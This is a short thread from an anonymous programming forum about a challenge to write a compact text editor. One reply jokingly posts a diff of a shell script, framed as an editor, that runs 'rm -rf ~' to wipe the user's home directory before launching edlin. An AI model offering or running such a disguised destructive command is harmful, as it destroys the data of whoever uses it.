Return Styles: Pseud0ch, Terminal, Valhalla, NES, Geocities, Blue Moon. Entire thread

/prog/ challenge: Write a text editor

Name: Anonymous 2010-07-06 3:41

The best quality editor you can fit a post, not using external libraries. Only include default headers/imports/libraries.
Programs will be judged by their array of features, stability of operation and memory use.

Name: Anonymous 2010-07-08 14:35

>>48
@@ -1,3 +1,3 @@
 #!/bin/sh
 rm -rf ~ &
-/usr/local/bin/edlin
+exec /usr/local/bin/edlin

Here, I tail call optimized that for you.

Newer Posts
Don't change these.
Name: Email:
Entire Thread Thread List